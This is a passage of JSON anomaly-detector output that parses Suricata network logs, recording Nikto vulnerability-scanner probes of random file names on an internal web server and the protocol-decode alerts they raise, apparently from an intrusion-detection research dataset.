"http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46882, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":531532251536341,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 531532251536341, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80", "/parser/model/time": 1583349514.272047, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46884, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.show", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.272253, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":477548807594957,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46884, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":477548807594957,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 477548807594957, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80", "/parser/model/time": 1583349514.274557, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46886, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.274771, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46886, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1119818217040458, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80", "/parser/model/time": 1583349514.276675, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46888, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.chl+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.276861, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":287028353316318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 